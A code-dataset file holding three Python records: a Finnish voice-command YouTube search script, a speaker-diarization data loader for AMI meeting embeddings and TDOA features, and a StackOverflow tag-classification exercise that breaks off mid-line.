+{"seq_id": "104988596", "text": "import os\nimport sys\nimport time\nimport speech_recognition as sr\nimport webbrowser\nfrom googleapiclient.discovery import build\nfrom PIL import Image\nfrom dotenv import load_dotenv\nload_dotenv()\n\n# Google API and speech recognition initialization\nGOOGLE_API_KEY = os.getenv('GOOGLE_API_KEY')\nyoutube = build('youtube', 'v3', developerKey=GOOGLE_API_KEY)\nr = sr.Recognizer()\nmic = sr.Microphone()\n\n\ndef get_audio():\n with mic as source:\n # Tweaking sound recognition to filter out background noise\n r.dynamic_energy_threshold = False\n r.adjust_for_ambient_noise(source)\n r.energy_threshold = 1200\n print('Puhu....')\n audio = r.listen(source)\n print(audio)\n voice_data = ' '\n try:\n voice_data = r.recognize_google(audio, language='fi-FI')\n print(voice_data)\n except sr.UnknownValueError:\n print('I did not get that.')\n except sr.RequestError:\n print('Sorry, we have some techinal difficulties.')\n return voice_data\n\n\ndef send_response(vd):\n if vd.startswith('video '):\n query = vd.split(' ', 1)\n query_response = get_video(query[1])\n if query_response['items']: # User's query finds videos\n video_id = query_response['items'][0]['id']['videoId']\n else:\n return print('We found no videos with your request. :-/')\n video_url = f'https://www.youtube.com/watch?v={video_id}'\n webbrowser.get().open(video_url)\n # Ends the program\n if vd == 'exit':\n sys.exit()\n\n\ndef get_video(query):\n # pylint: disable=maybe-no-member\n req = youtube.search().list(q=query, type='video', maxResults=1, part='snippet')\n res = req.execute()\n return res\n\n\nwhile True:\n voice_data = get_audio()\n send_response(voice_data)\n", "repo_name": "Ahors/speech_recognition", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1823, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "googleapiclient.discovery.build", "line_number": 13, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 14, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 15, "usage_type": "call"}, {"api_name": "speech_recognition.UnknownValueError", "line_number": 31, "usage_type": "attribute"}, {"api_name": "speech_recognition.RequestError", "line_number": 33, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}]}
+{"seq_id": "6883091896", "text": "\"\"\"Loading meeting, segmentation and TDOA data from scp, rttm and del files.\"\"\"\n\nfrom functools import partial\nfrom multiprocessing.sharedctypes import Value\nfrom typing import List\nimport kaldiio\nimport numpy as np\nfrom collections import defaultdict\nimport os\nfrom copy import deepcopy\n\nfrom torch import float32\nimport configargparse\n\nnp.set_printoptions(threshold=np.inf)\n\ndef open_rttm(rttm_path):\n \"\"\"Open rttm file containing segmentation data.\n\n :param: str rttm_path: path to rttm file\n :return: List[List[str]] segments_desc_list: list of each line of the file as a lists of strings\n \"\"\"\n with open(rttm_path, \"r\") as rttm_file:\n segments_desc_list = [(line.strip()).split() for line in rttm_file]\n return segments_desc_list\n\n\ndef build_segment_desc_dict(rttm_path, filt=True):\n \"\"\"Build dictionary segment_desc_dict.\n\n :param: str rttm_path: path to rttm file\n :return: dict segment_desc_dict[meeting_id] = List(Tuple(start_index, end_index, speaker_label,\n start_time, end_time, duration))\n \"\"\"\n segment_desc_dict = defaultdict(list)\n removed_segs_dict = defaultdict(list)\n segments_desc_list = open_rttm(rttm_path)\n for segment_desc in segments_desc_list:\n meeting_id = segment_desc[1]\n try:\n start_index = int(segment_desc[5])\n except ValueError: # if ''\n start_index = segment_desc[5]\n try:\n end_index = int(segment_desc[6])\n except ValueError: # if ''\n end_index = segment_desc[6]\n speaker_label = segment_desc[7]\n start_time = round(float(segment_desc[3]), 2)\n duration = round(float(segment_desc[4]), 2)\n end_time = round(start_time + duration, 2)\n segment_desc_dict[meeting_id].append((start_index, end_index, speaker_label,\n start_time, end_time, duration))\n if filt:\n for meeting_id, segment_descs in segment_desc_dict.items(): # filter encompassed segments\n segment_desc_dict[meeting_id], removed_segs_dict[meeting_id] = filter_encompassed_segments(segment_descs)\n return segment_desc_dict, removed_segs_dict\n\n\ndef open_scp(scp_path):\n \"\"\"Open scp file containing paths to meeting d-vectors and return numpy array.\n\n :param: str scp_path: path to scp file\n :return: List[List[str]] meeting_path_lists: List of Lists [meeting_id, path_to_ark_file]\n \"\"\"\n with open(scp_path, \"r\") as scp_file:\n meeting_path_lists = [(line.strip()).split() for line in scp_file]\n return meeting_path_lists\n\n\ndef build_global_dvec_dict(args, dataset, split=False, tdoa=False, gccphat=False):\n \"\"\"Builds global d-vector dictionary (d-vectors from across all meetings)\n \n :param: str dataset: \"train\", \"dev\", or \"eval\"\n :param: Bool split: splits segments longer than 2s if True\n :return: dict global_dvec_dict[speaker_label] = List[dvector] where dvector is 32-D np array\n \"\"\"\n\n scp_path, rttm_path = get_file_paths(args, dataset)\n global_dvec_dict = {}\n meeting_path_lists = open_scp(scp_path)\n segment_desc_dict, _ = build_segment_desc_dict(rttm_path)\n for meeting_path_list in meeting_path_lists: # iterate through meetings\n meeting_id = meeting_path_list[0]\n meeting_path = meeting_path_list[1]\n meeting_dvectors_array = kaldiio.load_mat(meeting_path)\n for segment_desc in segment_desc_dict[meeting_id]:\n start_index = segment_desc[0]\n end_index = segment_desc[1]\n segment = meeting_dvectors_array[start_index:end_index]\n speaker = segment_desc[2]\n if split:\n # split segments longer than 2s to give more training examples\n num_subsegments = max(1, len(segment) // 100)\n 
subsegments = np.array_split(segment, num_subsegments)\n else:\n subsegments = [segment]\n for subsegment in subsegments:\n averaged_subsegment = np.mean(subsegment, axis=0)\n averaged_subsegment = averaged_subsegment/np.linalg.norm(averaged_subsegment)\n if speaker not in global_dvec_dict:\n global_dvec_dict[speaker] = [averaged_subsegment]\n else:\n global_dvec_dict[speaker].append(averaged_subsegment)\n\n return global_dvec_dict\n\n\ndef build_meeting_dvec_dict(args, dataset, split=False, tdoa=False, gccphat=False):\n \"\"\"Build meeting-level d-vector dictionary (dictionary of dictionaries, one per meeting).\n \n :param: str dataset: \"train\", \"dev\", or \"eval\"\n :param: Bool split: splits segments longer than 2s if True\n :return: dict meeting_dvec_dict[meeting_id] = {speaker_label: List[dvector]}\n \"\"\"\n print(\"Building meeting_dvec_dict\")\n scp_path, rttm_path = get_file_paths(args, dataset)\n meeting_dvec_dict = {}\n meeting_path_lists = open_scp(scp_path)\n segment_desc_dict, _ = build_segment_desc_dict(rttm_path)\n for meeting_path_list in meeting_path_lists: # iterate through meetings\n inner_dvec_dict = {} # to be a value in meeting_dvec_dict (defaultdict for numpy array?)\n meeting_id = meeting_path_list[0]\n meeting_path = meeting_path_list[1]\n meeting_dvectors_array = kaldiio.load_mat(meeting_path)\n for segment_desc in segment_desc_dict[meeting_id]:\n start_index = segment_desc[0]\n end_index = segment_desc[1]\n segment = meeting_dvectors_array[start_index:end_index]\n speaker = segment_desc[2]\n if split:\n # split segments longer than 2s to give more training examples\n num_subsegments = max(1, len(segment) // 100)\n subsegments = np.array_split(segment, num_subsegments)\n else:\n subsegments = [segment]\n for subsegment in subsegments:\n averaged_subsegment = np.mean(subsegment, axis=0)\n averaged_subsegment = averaged_subsegment/np.linalg.norm(averaged_subsegment)\n if speaker not in inner_dvec_dict:\n inner_dvec_dict[speaker] = [averaged_subsegment]\n else:\n inner_dvec_dict[speaker].append(averaged_subsegment)\n meeting_dvec_dict[meeting_id] = inner_dvec_dict\n return meeting_dvec_dict\n\n\ndef build_segment_dicts(args, dataset, filt=True, emb=\"dvec\", tdoa=False, gccphat=False, average=True, tdoa_norm=False):\n \"\"\"Build averaged_segmented_meetings_dict and segmented_speakers_dict (labels).\n\n :param: str dataset: \"train\", \"dev\", or \"eval\"\n :param: Bool filt: apply filtered_encomassed_segments\n :param: Bool dvec: include d-vectors\n :param: Bool tdoa: include TDOA values\n :param: Bool gccphat: include GCC-PHAT values\n :param: Bool average: average segments or leave as array\n :return: dict segmented_meetings_dict[meeting_id] = List[dvector] (Sequence of segments\n for each meeting. Each vector has some combination of dvec, tdoa, gccphat in that order)\n :return: dict segmented_speakers_dict[meeting_id] = List[str] (Sequence of speaker labels for each\n meeting)\n \"\"\"\n print(\"Building segment dicts\", 'emb: ' + emb, 'tdoa: ' + str(tdoa), 'gccphat: ' + str(gccphat), 'average: ' + str(average))\n # np_path is path to directory of numpy files, one per meeting\n emb_path, rttm_path = get_file_paths(args, dataset)\n # create two dictionaries with key as meeting_id:\n segmented_speakers_dict = {} # value is array of speakers aligning with segments\n segmented_meetings_dict = {} # value is array of segments. 
Each segment is 1 d-vector\n segment_desc_dict, removed_segs_dict = build_segment_desc_dict(rttm_path, filt=filt)\n\n if tdoa == True or gccphat == True:\n tdoas, gccphats = get_tdoa_gccphat(args, segment_desc_dict.keys(), norm=tdoa_norm)\n\n if emb == \"wav2vec2\":\n meeting_files_list = os.listdir(emb_path) # list of names of files in embedding directory\n meeting_files_list.remove(\"%s150.csv\" % dataset)\n for meeting_file in meeting_files_list: # iterate through meetings\n meeting_id = \"AMIMDM-\" + meeting_file[:-4] # NB: AMIMDM- prefix added\n meeting_path = emb_path + '/' + meeting_file\n meeting_vectors = np.load(meeting_path, allow_pickle=True)\n # filter encompassed segments\n meeting_vectors = np.delete(meeting_vectors, removed_segs_dict[meeting_id], axis=0)\n meeting = meeting_vectors\n\n speakers = []\n meeting_tdoas = []\n meeting_gccphats = []\n for segment_index, segment_desc in enumerate(segment_desc_dict[meeting_id]):\n start_index = segment_desc[0]\n end_index = segment_desc[1]\n speaker = segment_desc[2]\n speakers.append(speaker)\n\n # L2 normalise\n meeting_vectors[segment_index] = meeting_vectors[segment_index]/np.linalg.norm(meeting_vectors[segment_index])\n\n # concatenate arrays, ignore final repeated/padding TDOA and GCC-PHAT values\n if tdoa == True:\n tdoa_segment = tdoas[meeting_id][start_index:end_index]\n meeting_tdoas.append(np.mean(tdoa_segment, axis=0))\n if gccphat == True:\n meeting_gccphats.append(np.mean(gccphats[meeting_id][start_index:end_index], axis=0))\n \n if tdoa == True:\n meeting_tdoas = np.array(meeting_tdoas)\n meeting = np.concatenate((meeting, meeting_tdoas), axis=1, dtype=np.float32)\n if gccphat == True:\n meeting_gccphats = np.array(meeting_gccphats)\n meeting = np.concatenate((meeting, meeting_gccphats), axis=1, dtype=np.float32)\n\n segmented_meetings_dict[meeting_id] = meeting.astype(np.float32)\n segmented_speakers_dict[meeting_id] = speakers\n assert(len(speakers) == len(meeting))\n\n elif emb == \"dvec\" or emb == \"None\": # unchanged from tdoa branch\n meeting_path_lists = open_scp(emb_path)\n for meeting_path_list in meeting_path_lists: # iterate through meetings\n meeting_id = meeting_path_list[0]\n meeting_path = meeting_path_list[1]\n if emb == \"dvec\":\n meeting_dvectors = kaldiio.load_mat(meeting_path)\n dvec_dim = meeting_dvectors.shape[1] # 32\n meeting = meeting_dvectors\n\n # concatenate arrays, ignore final repeated/padding TDOA and GCC-PHAT values\n if tdoa == True:\n if emb == \"dvec\":\n meeting_tdoas = tdoas[meeting_id][:len(meeting)]\n meeting = np.concatenate((meeting, meeting_tdoas), axis=1, dtype=np.float32)\n else:\n meeting = np.array(tdoas[meeting_id][:-12], dtype=np.float32)\n if gccphat == True:\n if emb == \"dvec\" or tdoa == True:\n meeting_gccphats = gccphats[meeting_id][:len(meeting)]\n meeting = np.concatenate((meeting, meeting_gccphats), axis=1, dtype=np.float32)\n else:\n meeting = np.array(gccphats[meeting_id][:-12], dtype=np.float32)\n\n speakers = []\n segments = []\n for segment_desc in segment_desc_dict[meeting_id]:\n start_index = segment_desc[0]\n end_index = segment_desc[1]\n segment = meeting[start_index:end_index]\n # take average regardless of data included\n if average == True:\n segment = np.mean(segment, axis=0)\n # only L2-normalise dvec part\n if emb == \"dvec\":\n segment[:dvec_dim] = segment[:dvec_dim]/np.linalg.norm(segment[:dvec_dim])\n # only do variance normalisation here for eval as otherwise done in data_aug.py\n if dataset == 'eval':\n segment[:dvec_dim] *= 
np.sqrt(dvec_dim)\n speaker = segment_desc[2]\n speakers.append(speaker)\n segments.append(segment)\n assert(len(segments) == len(speakers))\n segmented_meetings_dict[meeting_id] = segments\n segmented_speakers_dict[meeting_id] = speakers\n \n else:\n raise ValueError(\"emb invalid\")\n\n\n return segmented_meetings_dict, segmented_speakers_dict\n\n\ndef get_file_paths(args, dataset):\n \"\"\"Get path for chosen dataset.\n Dataset can be 'train', 'dev' or 'eval'.\n \"\"\"\n if dataset == 'train':\n emb_path = args.train_emb\n rttm_path = args.train_rttm\n elif dataset == 'dev':\n emb_path = args.valid_emb\n rttm_path = args.valid_rttm\n elif dataset == 'eval':\n emb_path = args.eval_emb\n rttm_path = args.eval_rttm\n else:\n raise ValueError(\"Expected dataset argument to be 'train', 'dev' or 'eval'\")\n return emb_path, rttm_path\n\n\ndef filter_encompassed_segments(_seg_list):\n \"\"\"Remove segments completely contained within another one based on time (not indices).\n Takes segment_desc_list from build_segment_desc_dict()\n\n :param: _seg_list np.array(segment_information)\n :return: seg_list np.array(segment_information)\n \"\"\"\n unsorted_seg_list = deepcopy(_seg_list)\n _seg_list.sort(key=lambda tup: tup[3])\n seg_list = []\n removed_seg_indices = []\n for segment in _seg_list:\n start_time = segment[3]\n end_time = segment[4]\n start_before = [_seg for _seg in _seg_list if _seg[3] <= start_time]\n end_after = [_seg for _seg in _seg_list if _seg[4] >= end_time]\n start_before.remove(segment)\n end_after.remove(segment)\n if set(start_before).isdisjoint(end_after):\n seg_list.append(segment)\n else:\n removed_seg_indices += [i for i, x in enumerate(unsorted_seg_list) if x == segment]\n \n return seg_list, removed_seg_indices\n\n\ndef get_tdoa_gccphat(args, meeting_ids, norm=False):\n \"\"\"Returns two dicts storing TDOA and GCC-PHAT values for meetings in a dataset.\n \n :param: str args.directory_path: path to directory containing del files\n :param: List[str] meeting_ids: list of meeting_ids to get data for\n :param: Bool norm: if True, normalise values at corpus level to have zero mean and unit variance\n\n :return: dict tdoas[meeting_id] = List[np.array(int)] Each entry in list is a vector\n of TDOA values aligned with d-vectors.\n :return: dict gccphats[meeting_id] = List[np.array(float)] Each entry in list is a vector\n of GCC-PHAT values aligned with d-vectors. 
\n \"\"\"\n print('Getting TDOA/GCCPHAT data')\n directory_path = args.tdoa_directory\n\n tdoas = defaultdict(list)\n gccphats = defaultdict(list)\n\n # all_tdoa_vecs = []\n # all_gccphat_vecs = []\n\n for meeting_id in meeting_ids:\n partial_meeting_id = meeting_id[8:]\n with open(directory_path + '/' + partial_meeting_id + '.del', 'r') as delays:\n delays_list = [(line.strip()).split() for line in delays]\n for delay in delays_list:\n # ignore second channel as that is fixed reference (always 0 1.000000)\n tdoa_vec = np.array([int(delay[2]), int(delay[6]), int(delay[8]), int(delay[10]),\n int(delay[12]), int(delay[14]), int(delay[16])])\n gccphat_vec = np.array([float(delay[3]), float(delay[7]), float(delay[9]), float(delay[11]),\n float(delay[13]), float(delay[15]), float(delay[17])])\n tdoas[meeting_id].append(tdoa_vec)\n gccphats[meeting_id].append(gccphat_vec)\n # all_tdoa_vecs.append(tdoa_vec)\n # all_gccphat_vecs.append(gccphat_vec)\n\n tdoas[meeting_id] = np.array(tdoas[meeting_id], dtype=np.float32)\n gccphats[meeting_id] = np.array(gccphats[meeting_id], dtype=np.float32)\n\n if norm == True:\n # all_tdoa_vecs = np.array(all_tdoa_vecs, dtype=np.float32)\n # all_gccphat_vecs = np.array(all_gccphat_vecs, dtype=np.float32)\n # tdoa_mean = np.mean(all_tdoa_vecs, axis=0) # mean vector \n # gccphat_mean = np.mean(all_gccphat_vecs, axis=0)\n # tdoa_std = np.std(all_tdoa_vecs, axis=0) # standard deviation vector\n # gccphat_std = np.std(all_gccphat_vecs, axis=0)\n\n # hard code stats from get_tdoa_gccphat_stats to save time (from train set)\n tdoa_mean = np.array([0.20190075, -0.05194093, 0.14035095, 0.52727616, 0.8346257, 1.0925584, 0.83129424], dtype=np.float32)\n tdoa_std = np.array([2.0948744, 2.3241794, 5.6177387, 5.9525986, 6.925673, 5.7009034, 4.0400524], dtype=np.float32)\n gccphat_mean = np.array([0.27077588, 0.26317957, 0.24773844, 0.23016952, 0.22052345, 0.21291934, 0.23988448], dtype=np.float32)\n gccphat_std = np.array([0.14447168, 0.13321947, 0.12776719, 0.12591319, 0.13311823, 0.12614751, 0.1267838] , dtype=np.float32)\n for meeting_id in tdoas:\n # normalise so data has zero mean and unit variance\n tdoas[meeting_id] = np.divide((tdoas[meeting_id] - tdoa_mean), tdoa_std)\n gccphats[meeting_id] = np.divide((gccphats[meeting_id] - gccphat_mean), gccphat_std)\n\n return tdoas, gccphats\n\n\ndef get_parser(): # debugging only, official paths should be maintained in asr_train.py\n parser = configargparse.ArgumentParser(\n description=\"Load speech data\",\n config_file_parser_class=configargparse.YAMLConfigFileParser,\n formatter_class=configargparse.ArgumentDefaultsHelpFormatter)\n\n # TODO: NB: back to segment level for debugging\n parser.add_argument('--train-scp', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/arks.concat/train.scp\", help='')\n parser.add_argument('--valid-scp', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/arks.meeting.cmn.tdnn/dev.scp\", help='')\n\n parser.add_argument('--train-np', type=str,\n default=\"/home/mifs/epcl2/project/embeddings/james/train\", help='')\n\n parser.add_argument('--eval-emb', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/arks.meeting.cmn.tdnn/eval.scp\", help='')\n parser.add_argument('--eval-rttm', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/window_level_rttms/eval150_window_level.rttm\", help='')\n # parser.add_argument('--eval-emb', type=str,\n # default=\"/home/mifs/epcl2/project/embeddings/james/eval\", help='')\n # parser.add_argument('--eval-rttm', type=str,\n # 
default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/eval.rttm\", help='')\n\n parser.add_argument('--train-rttm', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/train.rttm\", help='')\n parser.add_argument('--valid-rttm', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/dev.rttm\", help='')\n parser.add_argument('--tdoa-directory', type=str,\n default=\"/data/mifs_scratch/jhrt2/BeamformIt/MDM_AMI_fixedref_10\", help='')\n return parser\n\ndef main():\n parser = get_parser()\n args, _ = parser.parse_known_args()\n dataset = 'eval'\n\n meetings, speakers = build_segment_dicts(args, dataset, filt=True, emb=\"None\", tdoa=True, gccphat=False, average=True)\n\n meeting_id = \"AMIMDM-0TS3003a\"\n meeting_id = \"AMIMDM-0EN2002b\"\n print(meeting_id)\n TDOAS = []\n first_speaker = speakers[meeting_id][0]\n for segment_index in range(len(meetings[meeting_id])):\n if speakers[meeting_id][segment_index] == first_speaker:\n # print(meetings[meeting_id][segment_index])\n TDOAS.append(meetings[meeting_id][segment_index])\n \n TDOAS = np.array(TDOAS)\n print(np.std(TDOAS, axis=0))\n \n\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "jamest08/newDNC", "sub_path": "espnet/data_prep/data_loading.py", "file_name": "data_loading.py", "file_ext": "py", "file_size_in_byte": 20003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.set_printoptions", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 15, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 35, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 36, "usage_type": "call"}, {"api_name": "kaldiio.load_mat", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array_split", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 100, "usage_type": "attribute"}, {"api_name": "kaldiio.load_mat", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.array_split", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 194, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 205, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 210, "usage_type": "attribute"}, 
{"api_name": "kaldiio.load_mat", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 228, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 236, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 249, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 252, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 292, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 326, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 347, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 348, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 359, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 360, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 361, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 362, "usage_type": "attribute"}, {"api_name": "numpy.divide", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 366, "usage_type": "call"}, {"api_name": "configargparse.ArgumentParser", "line_number": 372, "usage_type": "call"}, {"api_name": "configargparse.YAMLConfigFileParser", "line_number": 374, "usage_type": "attribute"}, {"api_name": "configargparse.ArgumentDefaultsHelpFormatter", "line_number": 375, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 420, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 421, "usage_type": "call"}]}
+{"seq_id": "36934292472", "text": "# Predict tags for posts from StackOverflow. To solve this task you will use multilabel classification approach.\n#\n# Libraries\n#\n# Numpy — a package for scientific computing.\n# Pandas — a library providing high-performance, easy-to-use data structures and data analysis tools for the Python\n# scikit-learn — a tool for data mining and data analysis.\n# NLTK — a platform to work with natural language.\n\n\nimport sys\nimport nltk\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\n\nfrom ast import literal_eval\nimport pandas as pd\nimport numpy as np\nimport re\n\ndef read_data(filename):\n data = pd.read_csv(filename, sep='\\t')\n data['tags'] = data['tags'].apply(literal_eval)\n return data\n\ntrain = read_data('data/train.tsv')\nvalidation = read_data('data/validation.tsv')\ntest = pd.read_csv('data/test.tsv', sep='\\t')\n\nX_train, y_train = train['title'].values, train['tags'].values\nX_val, y_val = validation['title'].values, validation['tags'].values\nX_test = test['title'].values\n\n\nREPLACE_BY_SPACE_RE = re.compile('[/(){}\\[\\]\\|@,;]')\nBAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')\nSTOPWORDS = set(stopwords.words('english'))\n\n\ndef text_prepare(text):\n \"\"\"\n text: a string\n\n return: modified initial string\n \"\"\"\n text = text.lower() # lowercase text\n text = REPLACE_BY_SPACE_RE.sub(' ', text) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub('', text) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join([word for word in text.split() if word not in (STOPWORDS)]) # delete stopwords from text\n\n return text\n\n\n\nX_train = [text_prepare(x) for x in X_train]\nX_val = [text_prepare(x) for x in X_val]\nX_test = [text_prepare(x) for x in X_test]\n\ntags_counts = {}\n# Dictionary of all words from train corpus with their counts.\nwords_counts = {}\n\n# ' '.join(X_train[:3])\nrx = re.compile('([\\[\\],\\'\\'])')\nrx.sub('', ' '.join(str(v) for v in y_train[:10])).split(' ')\n\n\nfrom collections import Counter\ntags_counts = Counter(rx.sub('', ' '.join(str(v) for v in y_train)).split(' '))\nwords_counts = Counter(' '.join(X_train).split(' '))\n\n\n\n\nsorted_words = sorted(words_counts.items(), key=lambda x: x[1], reverse=True)[:5000]\n\n\n\n\nDICT_SIZE = 5000\nsorted_words = sorted(words_counts.items(), key=lambda x: x[1], reverse=True)[:DICT_SIZE]\nINDEX_TO_WORDS = dict(enumerate(list(dict(sorted_words).keys())))\nWORDS_TO_INDEX = dict(zip(INDEX_TO_WORDS.values(), INDEX_TO_WORDS.keys()))\n\nALL_WORDS = WORDS_TO_INDEX.keys()\n\n\ndef my_bag_of_words(text, words_to_index, dict_size):\n \"\"\"\n text: a string\n dict_size: size of the dictionary\n\n return a vector which is a bag-of-words representation of 'text'\n \"\"\"\n result_vector = np.zeros(dict_size)\n for each_word in text.split():\n # print(each_word)\n if (each_word in words_to_index.keys()):\n result_vector[words_to_index.get(each_word)] = result_vector[words_to_index.get(each_word)] + 1\n\n return result_vector\n\ndef test_my_bag_of_words():\n words_to_index = {'hi': 0, 'you': 1, 'me': 2, 'are': 3}\n examples = ['hi how are you']\n answers = [[1, 1, 0, 1]]\n for ex, ans in zip(examples, answers):\n if (my_bag_of_words(ex, words_to_index, 4) != ans).any():\n return \"Wrong answer for the case: '%s'\" % ex\n return 'Basic tests are passed.'\n\nprint(test_my_bag_of_words())\n\nfrom scipy import sparse as sp_sparse\n\nX_train_mybag = sp_sparse.vstack([sp_sparse.csr_matrix(my_bag_of_words(text, WORDS_TO_INDEX, 
DICT_SIZE)) for text in X_train])\nX_val_mybag = sp_sparse.vstack([sp_sparse.csr_matrix(my_bag_of_words(text, WORDS_TO_INDEX, DICT_SIZE)) for text in X_val])\nX_test_mybag = sp_sparse.vstack([sp_sparse.csr_matrix(my_bag_of_words(text, WORDS_TO_INDEX, DICT_SIZE)) for text in X_test])\nprint('X_train shape ', X_train_mybag.shape)\nprint('X_val shape ', X_val_mybag.shape)\nprint('X_test shape ', X_test_mybag.shape)\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef tfidf_features(X_train, X_val, X_test):\n \"\"\"\n X_train, X_val, X_test — samples\n return TF-IDF vectorized representation of each sample and vocabulary\n \"\"\"\n # Create TF-IDF vectorizer with a proper parameters choice\n # Fit the vectorizer on the train set\n # Transform the train, test, and val sets and return the result\n\n\n tfidf_vectorizer = TfidfVectorizer(min_df=5, max_df=0.9, ngram_range=(1, 2), use_idf=True, token_pattern=r'(\\S+)')\n\n X_train = tfidf_vectorizer.fit_transform(X_train)\n X_test = tfidf_vectorizer.transform(X_test)\n X_val = tfidf_vectorizer.transform(X_val)\n\n return X_train, X_val, X_test, tfidf_vectorizer.vocabulary_\n\n\nX_train_tfidf, X_val_tfidf, X_test_tfidf, tfidf_vocab = tfidf_features(X_train, X_val, X_test)\ntfidf_reversed_vocab = {i:word for word,i in tfidf_vocab.items()}\n\nprint('c#' in tfidf_reversed_vocab.values())\nprint('c++' in tfidf_reversed_vocab.values())\n\n\n\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nmlb = MultiLabelBinarizer(classes=sorted(tags_counts.keys()))\ny_train = mlb.fit_transform(y_train)\ny_val = mlb.fit_transform(y_val)\n\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.linear_model import LogisticRegression\n\n\n# from sklearn.utils import class_weight\n# # In order to calculate the class weight do the following\n#\n# class_weights = class_weight.compute_class_weight('balanced',\n# np.unique(y_train),\n# y_train)\n\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import GridSearchCV\n\n#\n# def train_classifier(X_train, y_train):\n# \"\"\"\n# X_train, y_train — training data\n#\n# return: trained classifier\n# \"\"\"\n# # scaler = StandardScaler(with_mean=False)\n# # scaler.fit(X_train)\n#\n# # Create and fit LogisticRegression wrapped into OneVsRestClassifier.\n# # clf = OneVsRestClassifier(LogisticRegression(C=1, multi_class='ovr', max_iter=1000, solver='liblinear',\n# # class_weight='balanced'))\n# model_to_set = 